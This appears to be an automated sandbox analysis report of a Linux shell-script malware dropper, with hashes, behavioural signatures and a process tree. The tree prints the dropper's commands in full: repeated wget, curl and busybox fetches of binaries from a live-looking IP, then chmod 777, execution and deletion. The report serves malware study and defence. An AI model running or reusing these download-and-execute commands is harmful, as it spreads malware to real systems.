Analysis
-
max time kernel
60s -
max time network
103s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
25/11/2024, 02:54
Static task
static1
Behavioral task
behavioral1
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh
-
Size
10KB
-
MD5
b643808c01faa0f92bf870288eb8dd16
-
SHA1
494306996b3ee0573b6da340ee334523cd39f9eb
-
SHA256
b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad
-
SHA512
f8e2bed091a7cf127f3feadc979a7ee81e9835a68b98f78afc737f354cdf3348e42f4551cc47d805e0734fd77e02963e665aad84c33c02e18395f86754ae24cb
-
SSDEEP
96:+Hb3G9hf3INVTX1G+Emzer6e0D7tAokHbrf3+PTX1G+1emzer6wN6W:+Hb3VvTX1G+EmzereTX1G+Mmzerx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 25 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 741 chmod 799 chmod 839 chmod 851 chmod 863 chmod 883 chmod 691 chmod 707 chmod 831 chmod 871 chmod 890 chmod 904 chmod 768 chmod 825 chmod 877 chmod 724 chmod 782 chmod 819 chmod 845 chmod 857 chmod 896 chmod 910 chmod 916 chmod 681 chmod 759 chmod -
Executes dropped EXE 25 IoCs
ioc pid Process /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 684 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 692 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs 709 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q 726 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF 742 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB 760 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av 769 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC 783 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL 801 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P 820 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe 826 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy 833 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu 840 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f 846 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 852 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF 858 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB 864 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av 872 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC 878 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 884 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs 891 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q 897 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL 905 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu 911 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f 917 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f -
Checks CPU configuration 1 TTPs 25 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL curl File opened for modification /tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P curl File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 curl File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q curl File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF curl File opened for modification /tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe curl File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu curl File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 curl File opened for modification /tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL curl File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs curl File opened for modification /tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59 curl File opened for modification /tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7 curl File opened for modification /tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs curl File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB curl File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av curl File opened for modification /tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF curl File opened for modification /tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB curl File opened for modification /tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q curl File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f curl File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC curl File opened for modification /tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy curl File opened for modification /tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f curl File opened for modification /tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av curl File opened for modification /tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC curl File opened for modification /tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu curl
Processes
-
/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh/tmp/b594f506a2b2e54b98f320880c32150a5c66038299c0f69d9f7105521f0b89ad.sh1⤵PID:652
-
/bin/rm/bin/rm bins.sh2⤵PID:655
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:658
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:668
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:677
-
-
/bin/chmodchmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- File and Directory Permissions Modification
PID:681
-
-
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Executes dropped EXE
PID:684
-
-
/bin/rmrm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:685
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:686
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:689
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:690
-
-
/bin/chmodchmod 777 RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- File and Directory Permissions Modification
PID:691
-
-
/tmp/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut7./RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Executes dropped EXE
PID:692
-
-
/bin/rmrm RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:693
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:694
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:695
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:698
-
-
/bin/chmodchmod 777 CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- File and Directory Permissions Modification
PID:707
-
-
/tmp/CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs./CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵
- Executes dropped EXE
PID:709
-
-
/bin/rmrm CNnqpBeZY3eAPzyWH8uczPvp6Qiui3bHSs2⤵PID:710
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:712
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:721
-
-
/bin/chmodchmod 777 QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q./QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm QcVUZ7ZSEFixj5aVVVGoWZOGTnXoXhjm3Q2⤵PID:727
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:728
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:737
-
-
/bin/chmodchmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:743
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:744
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:757
-
-
/bin/chmodchmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:762
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:764
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:767
-
-
/bin/chmodchmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:770
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:771
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:774
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:779
-
-
/bin/chmodchmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- File and Directory Permissions Modification
PID:782
-
-
/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Executes dropped EXE
PID:783
-
-
/bin/rmrm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:784
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:785
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:795
-
-
/bin/chmodchmod 777 i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL./i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm i8yS9VWG2bqxoPT4aalSyYZMFOh0IFWOGL2⤵PID:802
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:803
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:818
-
-
/bin/chmodchmod 777 MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P./MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm MOrMYigJsDZ9bOdxrCxXhCmTisTkXVsf3P2⤵PID:821
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:822
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:824
-
-
/bin/chmodchmod 777 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe./6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm 6e50JUZvANqHMgApF7Srbsq6hwk8yfKEfe2⤵PID:827
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:828
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:830
-
-
/bin/chmodchmod 777 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy./8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm 8WBd5YQBV1XkaCuXpTmPlASTQEfeh702dy2⤵PID:834
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:836
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:838
-
-
/bin/chmodchmod 777 xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu./xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm xpfV7iZfDHdDxWI4gKXr6YBcUTr44s0vvu2⤵PID:841
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:842
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:844
-
-
/bin/chmodchmod 777 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f./2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵
- Executes dropped EXE
PID:846
-
-
/bin/rmrm 2mvl4t3TK8TMDUkXqjbkFa1rDzb6uNgW3f2⤵PID:847
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:848
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:850
-
-
/bin/chmodchmod 777 Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN59./Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm Jnxpi2LTAq7X3Q1CRYhQxDDigmLBKHkN592⤵PID:853
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:854
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:856
-
-
/bin/chmodchmod 777 z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- File and Directory Permissions Modification
PID:857
-
-
/tmp/z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF./z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵
- Executes dropped EXE
PID:858
-
-
/bin/rmrm z25gEXNIJE5CQauEjrWBNsO2haINoBkLWF2⤵PID:859
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:860
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:862
-
-
/bin/chmodchmod 777 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB./8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm 8cIkc4wMN3wg5GcmLlxlVD8do2DzxhnxxB2⤵PID:865
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:866
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:870
-
-
/bin/chmodchmod 777 nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av./nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm nBuRg1cvNzMbbnucShgz1ppnOh5JP318Av2⤵PID:873
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:874
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:876
-
-
/bin/chmodchmod 777 roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC./roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm roxI1Sl100oqiDJmwVpT114qHXrdfSqHVC2⤵PID:879
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:880
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RObPHysGT5dMGEMe7zTmLCq6UE6FTq2Ut72⤵PID:882
-
-
